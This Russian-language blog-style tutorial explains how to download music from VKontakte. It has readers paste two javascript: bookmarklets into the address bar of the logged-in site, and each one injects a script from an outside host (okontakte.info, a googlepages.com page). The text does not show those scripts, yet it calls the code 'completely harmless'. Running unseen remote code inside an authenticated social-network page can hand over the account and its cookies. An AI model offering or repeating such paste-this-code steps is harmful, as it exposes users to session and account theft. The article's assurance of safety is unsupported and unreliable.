В данной статье я вам расскажу как можно скачать музыку с контакта, в этой статье будут написаны примеры скачивания музыки с соц. сети вконтакте.ру лично проверенные мной.
Музыкальная база соц. сети контакт насчитывает ~ 100 - 1000 Тб. музыки точно сказать трудно, и с каждым днём нам всё чаще и чаще надо скачать понравившуюся музыку, в сети интернет есть много статей и способов как скачать музыку из контакта но 99% всех этих способов это уловка что бы заполучить ваши пароли от @mail или от вашей странички разными методами, но в данной статье я буду вам рассказывать как скачать музыку без всякого риска и только те способы, которые проверил сам!
В данной статье будут приведены подробное описание со скриншотами каждого действия, таким образом даже самый не уверенный в себе человек сможет скачать музыку без всякого труда!
Что бы скачивать музыку нам надо:
- Компьютер;
- Интернет;
- Желание;
если у вас всё это имеется при себе то я думаю можно начинать!
Способ № 1
Code
В этом способе мы будем рассматривать способ скачки через JS (java script), этот способ самый простой для начала нам надо зайти на страницу с той песней которую мы хотим скачать, затем в строку вашего браузера вставляем дынный JS код
[Table]javascript: (function(){var s=document.createElement('script'); s.src='http://okontakte.info/audio.js'; s.type='text/javascript'; document.getElementsByTagName('head')[0].appendChild(s); })();
не волнуйтесь он полностью без вреден
После вставки нажимаем на клавишу "Enter" и теперь что бы скачать нужную нам песню мы нажимаем на "Play" и нам тут же вместо песни даётся ссылка на её скачивание:
мы нажимаем на "Скачать" и вуаля, готово начинается скачивание, теперь вы знаете уже один способ как можно скачать музыку с контакта.
Еще один новый скрипт!
Code
javascript:(function(){var s=document.createElement('script'); s.src='http://tosamoepalevo.googlepages.com/audio.js'; s.type='text/javascript'; document.getElementsByTagName('head')[0].appendChild(s); })();
Копируете код! вставляете в адресную строку, и возле песен появляется ссылка - download!